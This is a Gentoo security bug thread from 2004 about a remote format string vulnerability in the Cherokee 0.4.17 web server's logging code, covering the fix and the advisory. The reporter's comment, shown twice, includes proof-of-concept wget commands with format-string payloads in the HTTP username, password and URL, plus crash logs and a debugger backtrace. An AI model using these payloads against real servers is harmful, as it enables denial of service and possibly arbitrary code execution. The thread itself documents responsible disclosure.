67667 2004-10-15 08:02 0000 www-servers/cherokee: remote Format String Vulnerability 2004-11-04 14:26:28 0000 1 Unclassified Gentoo Security Vulnerabilities unspecified All All RESOLVED FIXED http://www.alobbs.com/cherokee B1 [glsa] jaervosz P2 major --- 1 ruth@gentoo.org security@gentoo.org stuart@gentoo.org ruth@gentoo.org 2004-10-15 08:02:05 0000 hi, i have found a remote exploitable formatstring bug in the Webserver cherokee-0.4.17. the affected function is located in logger_ncsa.c: cherokee_logger_ncsa_write_string(): ret_t cherokee_logger_ncsa_write_string (cherokee_logger_ncsa_t *logger, const char *string) { if (logger->accesslog_fd != NULL) { int ret; ret = fprintf (logger->accesslog_fd, string); return (ret > 0) ? ret_ok : ret_error; } syslog (LOG_INFO, "%s", string); return ret_ok; } this function is called, if a users authenticates to the server with username plus password (via auth_pam) in validator_pass.c: --- snip --- ret_t cherokee_validator_pam_check (cherokee_validator_pam_t *pam, cherokee_connection_t *conn) { ... /* Try to authenticate user: */ ret = _pam_dispatch (pamhandle, 0, 1); if (ret != PAM_SUCCESS) { cherokee_logger_write_string ( CONN_VSRV(conn)->logger, "PAM: user '%s' - not authenticated: %s", conn->user->buf, pam_strerror(pamhandle, ret)); goto unauthorized; } ... --- snip --- demonstration: client: bash-2.05b$ wget --http-user=%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x --http-passwd=%n%n%x http://127.0.0.1/private/index.html --01:12:39-- http://127.0.0.1/private/index.html => `index.html' Connecting to 127.0.0.1:80... connected. HTTP request sent, awaiting response... End of file while parsing headers. Retrying. --01:12:41-- http://127.0.0.1/private/index.html (try: 2) => `index.html' Connecting to 127.0.0.1:80... failed: Connection refused. bash-2.05b$ server: bender root # cherokee -C /etc/cherokee/cherokee.conf PHP interpreter not found (/usr/lib/cgi-bin/php4). Please install it. Cherokee Web Server 0.4.17: Listening on port 80, using poll, 1024 fds limit 5 threads, 204 fds in each, standard scheduling policy, TLS disabled Cherokee feels panic! Killed bender root # server log: you can find very interesting data in /var/log/cherokee.access: PAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s ruth@gentoo.org 2004-10-15 08:02:05 0000 hi, i have found a remote exploitable formatstring bug in the Webserver cherokee-0.4.17. the affected function is located in logger_ncsa.c: cherokee_logger_ncsa_write_string(): ret_t cherokee_logger_ncsa_write_string (cherokee_logger_ncsa_t *logger, const char *string) { if (logger->accesslog_fd != NULL) { int ret; ret = fprintf (logger->accesslog_fd, string); return (ret > 0) ? ret_ok : ret_error; } syslog (LOG_INFO, "%s", string); return ret_ok; } this function is called, if a users authenticates to the server with username plus password (via auth_pam) in validator_pass.c: --- snip --- ret_t cherokee_validator_pam_check (cherokee_validator_pam_t *pam, cherokee_connection_t *conn) { ... /* Try to authenticate user: */ ret = _pam_dispatch (pamhandle, 0, 1); if (ret != PAM_SUCCESS) { cherokee_logger_write_string ( CONN_VSRV(conn)->logger, "PAM: user '%s' - not authenticated: %s", conn->user->buf, pam_strerror(pamhandle, ret)); goto unauthorized; } ... --- snip --- demonstration: client: bash-2.05b$ wget --http-user=%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x%s%s%s%s%s%s%s%x --http-passwd=%n%n%x http://127.0.0.1/private/index.html --01:12:39-- http://127.0.0.1/private/index.html => `index.html' Connecting to 127.0.0.1:80... connected. HTTP request sent, awaiting response... End of file while parsing headers. Retrying. --01:12:41-- http://127.0.0.1/private/index.html (try: 2) => `index.html' Connecting to 127.0.0.1:80... failed: Connection refused. bash-2.05b$ server: bender root # cherokee -C /etc/cherokee/cherokee.conf PHP interpreter not found (/usr/lib/cgi-bin/php4). Please install it. Cherokee Web Server 0.4.17: Listening on port 80, using poll, 1024 fds limit 5 threads, 204 fds in each, standard scheduling policy, TLS disabled Cherokee feels panic! Killed bender root # server log: you can find very interesting data in /var/log/cherokee.access: PAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s 1@ìd@$G@Ã&#155;/@$G@°.@°XPAM: user '(null)0ö0öPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication module0ö$ìPAM: user '%s%s%s%s%s%s%s%s%s%s%s' - not authenticated: User not known to the underlying authentication modulePAM: user '%s' - not authenticated: %s 1@ìd@$G@Ã&#155;/@$G@ °.@¨X to be clear: the syslog() fkt is porperly protected - it happens one before... debugger attached to server: Attaching to program: /usr/sbin/cherokee, process 23158 Reading symbols from /usr/lib/libcherokee.so.0...done. Loaded symbols for /usr/lib/libcherokee.so.0 Reading symbols from /lib/libpthread.so.0...done. [Thread debugging using libthread_db enabled] [New Thread 16384 (LWP 23158)] [New Thread 32769 (LWP 23159)] [New Thread 16386 (LWP 23160)] [New Thread 32771 (LWP 23161)] [New Thread 49156 (LWP 23162)] [New Thread 65541 (LWP 23163)] Loaded symbols for /lib/libpthread.so.0 Reading symbols from /lib/libdl.so.2...done. Loaded symbols for /lib/libdl.so.2 Reading symbols from /lib/libc.so.6...done. [more symbols] Reading symbols from /usr/lib/cherokee/libcherokee_plain.so...done. Loaded symbols for /usr/lib/cherokee/libcherokee_plain.so 0x40165a11 in loser_poll () from /lib/libc.so.6 (gdb) step Single stepping until exit from function loser_poll, which has no line number information. [Switching to Thread 16384 (LWP 23158)] 0x40165aca in poll () from /lib/libc.so.6 (gdb) step Single stepping until exit from function poll, which has no line number information. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 65541 (LWP 23163)] 0x4011f753 in strlen () from /lib/libc.so.6 (gdb) backtrace #0 0x4011f753 in strlen () from /lib/libc.so.6 #1 0x400f6d29 in vfprintf () from /lib/libc.so.6 #2 0x400fcfef in fprintf () from /lib/libc.so.6 #3 0x4030292d in cherokee_logger_ncsa_write_string (logger=0x3a4d4150, string=0x267a <Address 0x267a out of bounds>) at logger_ncsa.c:295 #4 0x4003e7c8 in cherokee_logger_write_string (logger=0x806e150, format=0x3a4d4150 <Address 0x3a4d4150 out of bounds>) at logger.c:156 #5 0x402fdd55 in cherokee_validator_pam_check (pam=0x807ef10, conn=0x807e780) at validator_pam.c:180 #6 0x40042eb0 in cherokee_validator_check (validator=0x0, conn=0x3a4d4150) at validator.c:63 #7 0x40039d44 in cherokee_connection_check_authentication (cnt=0x807e780, plugin_entry=0x806ef18) at connection.c:1296 #8 0x4003f171 in process_active_connections (thd=0x807d090) at thread.c:460 #9 0x4003fce8 in cherokee_thread_step_MULTI_THREAD (thd=0x807d090, dont_block=false) at thread.c:1096 #10 0x4003eb84 in thread_routine (data=0x807d090) at thread.c:73 #11 0x4006b01f in pthread_start_thread () from /lib/libpthread.so.0 #12 0x4016ee6a in clone () from /lib/libc.so.6 (gdb) another impact: client: wget http://127.0.0.1/%s%s%s%s%s%s%s%s%s%s%s%s%s% [+x] %s serverlog: 127.0.0.1 - - [15/Oct/2004:01:30:58 +0100] "GET /%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$G@pP]è@P`,ú¿$G@`PX¤@P`$G@Ã&#138;í@``Dú¿$G@$G@`ï@`xú¿ «@ç´´â&#150;&#146;©$G@Pçèü°ç$G@Ã&#140;û¿ë@u@;@à û¿;@à û¿°@øü¿¯@jî@à û¿ ¤@(@(@ ¤øÿ¿@µ@ ¤@â&#150;&#146;øÿ¿$G@Ã&#152;Ã&#140;P(¨@ì ¤@u@Ã&#128;Ã&#128;'Ã&#128;!ý¿a¤ý¿¬ý¿ÿ¿ªÃ&#128;@0¤@ we're basically hitting the stack here... we can do everything, send shellcde, write .dtors, etc... Impact: -> a succesful exploitation of this bug leads to execution of arbitrary code (with server rights, of course) -> in case of unsuccessful exploitation, this leads to a denial of service. i think, this bug should be fixed upstream, therefore i have not attached a patch for this issue. author has _not_ yet been informed about this bug. best regards florian [rootshell] koon@gentoo.org 2004-10-20 01:10:42 0000 Audit team, please peer-review this one before we take it to upstream and/or vendor-sec. krispykringle@gentoo.org 2004-10-26 14:47:26 0000 This is confirmed. Easy DoS, potential code execution (I'll have to spend more time on that part; I haven't managed RCE yet). Time to contact the Cherokee dev team and possibly forward to vendor-sec. I'm writing to them now. Thanks, rootshell. koon@gentoo.org 2004-10-27 01:14:50 0000 Krispy: don't forget to credit Florian if you write directly upstream. Maybe it's best if he writes to them himself. klieber/solar: do you think this one needs to be coordinated with vendor-sec ? Who ships cherokee ? ruth@gentoo.org 2004-10-30 07:43:34 0000 hi, i just got this email (as CC) from chreokee maintainer: -- mail -- Hi Dan, First of all, thank you very much for the report :-) There are two patched versions that correct this bug: - The 0.4.17.1: It is the fixed 0.4.17: ftp://alobbs.com/cherokee/0.4/0.4.17/cherokee-0.4.17.1.tar.gz - The 0.4.18b25: It is a beta of the incoming release of Cherokee. It contains new features, but of are unfinished yet: http://alobbs.com/tmp/cherokee-0.4.18b25.tar.gz -- eof -- so please bump up to version 0.4.17.1 save to go public now... best regards florian [rootshell] ruth@gentoo.org 2004-10-30 07:48:15 0000 this is the debian maintainer, btw: http://people.debian.org/~rcardenes/#cherokee seems, that other distributions do _not_ ship cherokee by default... (at least i cant find 'official' rpms) best regards florian [rootshell] jaervosz@gentoo.org 2004-10-30 08:35:18 0000 Stuart please provide an updated ebuild or CC the right dev as this is not a public bug. stuart@gentoo.org 2004-10-30 10:12:36 0000 Updated ebuild committed, and marked stable on x86. Just needs marking stable on ppc now. jaervosz@gentoo.org 2004-10-30 13:49:44 0000 CC'ing pvdabeel instead of ppc as this bug is not public. Pieter please test and mark 0.4.17.1 stable. koon@gentoo.org 2004-11-01 02:16:18 0000 This is public now (see http://alobbs.com/) ppc: please mark stable. hansmi@gentoo.org 2004-11-01 02:34:22 0000 Stable on ppc. jaervosz@gentoo.org 2004-11-01 10:16:43 0000 GLSA 200411-02